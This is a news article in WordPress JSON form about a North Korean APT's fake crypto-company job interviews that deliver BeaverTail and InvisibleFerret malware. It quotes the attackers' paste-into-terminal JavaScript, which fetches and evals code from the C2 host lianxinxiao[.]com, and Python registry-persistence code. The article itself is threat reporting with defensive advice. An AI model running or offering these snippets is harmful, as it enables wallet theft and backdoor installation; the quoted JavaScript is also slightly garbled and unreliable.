{"id":3525,"date":"2025-04-25T10:04:15","date_gmt":"2025-04-25T10:04:15","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/04\/25\/north-korean-apt-hackers-create-companies-to-deliver-malware-strains-targeting-job-seekers\/"},"modified":"2025-04-25T10:04:15","modified_gmt":"2025-04-25T10:04:15","slug":"north-korean-apt-hackers-create-companies-to-deliver-malware-strains-targeting-job-seekers","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/04\/25\/north-korean-apt-hackers-create-companies-to-deliver-malware-strains-targeting-job-seekers\/","title":{"rendered":"North Korean APT Hackers Create Companies to Deliver Malware Strains Targeting Job Seekers"},"content":{"rendered":"<p>    North Korean APT Hackers Create Companies to Deliver Malware Strains Targeting Job Seekers<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated North Korean advanced persistent threat (APT) group known as \u201cContagious Interview\u201d has established elaborate fake cryptocurrency consulting companies to target job seekers with specialized malware.<\/p>\n<p>The group, a subunit of the infamous North Korean state-sponsored Lazarus Group, has created three front companies\u2014BlockNovas LLC, Angeloper Agency, and SoftGlide LLC\u2014to distribute malware through deceptive job interview processes.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjuUYXGTld5uCMPTKFvh-joJP9PbMV0XyJJnicXtvMxH1Lwh0miRUIM-U1ZvemNJtZnO2Z8U93kROZck_X7PTwhCAuvdOq-a0ZoknUEjF4i3HqJMO00S-v7-EF091m2jRO6vFzJgWB-h-KaamKtZYD6y1kzcUUmuZHYUGiiIMv7P30FkiXrHdsNvSGbAMY\/s16000\/Blocknovas%255B.%255Dcom%2520site%2520%28Source%2520-%2520Silent%2520Push%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Blocknovas[.]com site (Source \u2013 Silent Push)<\/figcaption><\/figure>\n<\/div>\n<p>The campaign targets cryptocurrency professionals and developers with promises of high-paying remote positions.<\/p>\n<p>Job applicants who engage with these fraudulent companies are unknowingly exposed to a trio of <a href=\"https:\/\/cybersecuritynews.com\/malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">malware<\/a> strains: BeaverTail, InvisibleFerret, and OtterCookie.<\/p>\n<p>These malicious tools are specifically designed to steal cryptocurrency wallet credentials, browser data, and provide backdoor access to victim machines.<\/p>\n<p>Silent Push threat analysts <a href=\"https:\/\/www.silentpush.com\/blog\/contagious-interview-front-companies\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">uncovered<\/a> this elaborate scheme after identifying unusual configurations in BeaverTail malware samples.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhZu1BTGzi9nRuvs9mFD5QpuXjeGiftIKE5zBP1zxMsMKVoj-s1-ucYWbYR9HG8qnF2kEnLLOgSacHRSSmDv03qZXTSUG-sPgL_uraIhz_2AUplov4nkDy2rnQfIzjIpnwn7QDHmjDRytGPQ31gE7Gc73iA7mSDRuY2s0iwJJPh6nQVLtZYRaedY82QBu4\/s16000\/Fake%2520profiles%2520%28Source%2520-%2520Silent%2520Push%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Fake profiles (Source \u2013 Silent Push)<\/figcaption><\/figure>\n<\/div>\n<p>Their investigation revealed the threat actors heavily utilize AI-generated images to create convincing \u201cemployee\u201d profiles across multiple platforms, including LinkedIn, where the fake companies maintain active presences complete with falsified work histories and client testimonials.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEj7W6ThfpGRhdht3uJeWQztkXrXd5SontAiqZOK4Altwf4x849j5oWl8V8fm7uuV7-_4lR8Gupe2RjkBbOT-syFs353LFh96WEgHaLFcWlGrrWiFfDLd7Um8k5vuB0Cc_Ylo_QXRnU8k6hxOTcQGzeppAhnNrmlEc6OhpQLXJm7712-RXY4XTuaA9lZHSk\/s16000\/Fake%2520employee%2520profiles%2520%28Source%2520-%2520Silent%2520Push%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Fake employee profiles (Source \u2013 Silent Push)<\/figcaption><\/figure>\n<\/div>\n<p>The APT group\u2019s technical sophistication is evident in their cross-platform malware deployment strategy, which affects Windows, macOS, and Linux systems.<\/p>\n<p>One victim reported that their MetaMask wallet was compromised shortly after running code provided during a skill assessment test from BlockNovas.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgTJIxE5kn88cvs1clMgMtK_-vkQ380efttL-J3hWFnnDDpIjcH7hAAN9dvQ8Anpi0cSzXY0ZE9KSPj52aNzle4yWqQ2gcIqIjXl1yAbP2Lzq6mz0ncv3HFte-lyddj6m4LXSNW6phs8HUt8_9ugZ8KbgSTPrlp3a7pcHyFp799tOHoj26qsd5oS5nlfwE\/s16000\/BeaverTail%2520distributing%2520domain%2520lianxinxiao%255B.%255D.com%2520%28Source%2520-%2520Silent%2520Push%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">BeaverTail distributing domain lianxinxiao[.].com (Source \u2013 Silent Push)<\/figcaption><\/figure>\n<\/div>\n<p>Analysis of the compromised system revealed connections to command and control servers at domains including lianxinxiao[.]com.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Infection Mechanism: The Fake Interview Flow<\/strong><\/h2>\n<p>The infection process begins when candidates apply for positions through legitimate job sites like Upwork, Freelancer.com, or cryptocurrency-specific job boards.<\/p>\n<p>After initial contact, applicants are directed to company portals where they encounter a multi-stage interview process.<\/p>\n<p>The critical infection point occurs during the \u201cskill assessment\u201d phase, where candidates are asked to record a video introduction.<\/p>\n<p>When attempting to access camera permissions, the site presents an error message with a supposed fix involving pasting code into a terminal:-<\/p>\n<pre class=\"wp-block-code\"><code>fetch(eval(decodeURIComponent(''lianxinxiao[.]com:5000\/tokenizer'')))\n.then(response =&gt; response.text()) \n.then(data =&gt; { eval(data); });<\/code><\/pre>\n<p>This innocent-looking code actually fetches and executes the BeaverTail <a href=\"https:\/\/cybersecuritynews.com\/javascript-attacks-targeting\/\" target=\"_blank\" rel=\"noreferrer noopener\">JavaScript<\/a> malware, which subsequently downloads InvisibleFerret, a Python-based backdoor.<\/p>\n<p>The malware establishes persistence through various mechanisms depending on the operating system.<\/p>\n<p>On Windows systems, it creates registry entries:-<\/p>\n<pre class=\"wp-block-code\"><code>import winreg\nkey_path = r\"SOFTWAREMicrosoftWindowsCurrentVersionRun\"\nkey = winreg.HKEY_CURRENT_USER\nwith winreg.OpenKey(key, key_path, 0, winreg.KEY_ALL_ACCESS) as registry_key:\n    winreg.SetValueEx(registry_key, \"pythonws\", 0, winreg.REG_SZ, f'{python_exe} {script_path}')<\/code><\/pre>\n<p>The malware specifically targets <a href=\"https:\/\/cybersecuritynews.com\/cryptocore-cryptocurrency-scam-draining-wallets\/\" target=\"_blank\" rel=\"noreferrer noopener\">cryptocurrency wallets<\/a>, including MetaMask, BNB Chain, Coinbase, TronLink, Phantom, Crypto.com, and Coin98.<\/p>\n<p>It exfiltrates data to attacker-controlled servers and can deploy additional payloads based on C2 instructions.<\/p>\n<p>To avoid falling victim to such attacks, cybersecurity experts recommend scrutinizing job offers thoroughly, never executing code from unknown sources during interviews, and using dedicated devices for cryptocurrency management.<\/p>\n<p>Job seekers should verify company legitimacy through multiple channels before engaging with technical assessments that require executing code.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 92%,rgb(169,184,195) 100%)\"><strong><code>Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-&gt;\u00a0<a href=\"https:\/\/any.run\/cybersecurity-blog\/malware-trends-q1-2025\/?utm_source=cyber-threat-intel_linkedin&amp;utm_medium=post&amp;utm_campaign=q1&amp;utm_content=blog&amp;utm_term=150425\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Get Your Free Copy<\/a><\/code><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/north-korean-apt-hackers-create-companies-to-deliver-malware-strains\/\">North Korean APT Hackers Create Companies to Deliver Malware Strains Targeting Job Seekers<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/north-korean-apt-hackers-create-companies-to-deliver-malware-strains\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>North Korean APT Hackers Create Companies to Deliver Malware Strains Targeting Job Seekers A sophisticated North Korean advanced persistent threat (APT) group known as \u201cContagious Interview\u201d has established elaborate fake cryptocurrency consulting companies to target job seekers with specialized malware. The group, a subunit of the infamous North Korean state-sponsored Lazarus Group, has created three [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[63,258,649],"tags":[130],"class_list":["post-3525","post","type-post","status-publish","format-standard","hentry","category-cyber-security-news","category-malware","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/3525"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=3525"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/3525\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=3525"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=3525"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=3525"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}